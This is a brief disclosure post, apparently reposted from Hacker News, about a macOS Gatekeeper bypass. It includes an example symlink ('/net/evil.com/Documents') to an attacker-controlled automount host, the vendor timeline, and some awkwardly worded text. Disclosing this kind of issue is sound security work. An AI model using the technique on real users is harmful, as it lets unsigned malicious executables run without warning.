Filippo Cavallarin (Hacker News):
To better understand how this exploit works, let us consider the following scenario:
An attacker handles a zip file containing a symbolic link to an automount endpoint that he / she controls (ex Documents -> /net/evil.com/Documents) and submits it to the victim.
The victim downloads the malicious archive, extracts it and follows the symlink.
Now the victim is controlled by the attacker, but trusted by the Gatekeeper, so any attacker-driven executable can be run without warning. The way Finder is designed for (hide .app extensions, hide full path from the title bar) makes this technique very effective and difficult to see.
The vendor has been contacted on February 22, 2019 and is aware of this problem. This issue was to be addressed, according to the vendor, May 15, 2019, but Apple started releasing my emails. Since Apple is aware of my 90-day publication deadline, I publish this information.
These controls are in any case performed only when an app is run via LaunchServices, ie Finder. So a user should not be able to run an app with a corrupted signature from a new location using the Finder, but they can run an app with no signature at all, and any malicious scripts or processes can run code from an app with a corrupted one. signature without the signature checks being performed, unless it is kind enough to ask for them.
Stay updated by subscribing to the RSS Feed for this post.